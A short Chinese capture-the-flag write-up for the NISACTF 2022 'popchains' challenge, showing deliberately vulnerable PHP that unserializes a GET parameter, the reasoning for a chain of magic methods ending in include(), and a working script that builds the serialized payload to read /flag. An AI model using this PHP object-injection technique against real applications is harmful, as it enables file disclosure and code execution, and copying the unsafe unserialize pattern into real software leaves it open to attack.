[NISACTF 2022]popchains
题目如下:
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/ 思路:
先得找到漏洞点,
1.可以发现append函数有文件执行漏洞,
2.执行append函数需要触发__invoke,需要对象被当作函数调用,
3.Try_Work_Hard被当作函数调用需要触发Make_a_Change中的__get,
4.触发__get需要Road_is_Long中调用__tostring,
5.调用__tostring需要触发wakeup中的正则匹配,并且$this->page需要是Road_is_long类
<?php
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
}
class Try_Work_Hard{
protected $var="/flag";
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
}
$a=new Road_is_Long();
$a->page=$a;
$a->string=new Make_a_Change();
$a->string->effort=new Try_Work_Hard();
echo urlencode(serialize($a));
Comments | NOTHING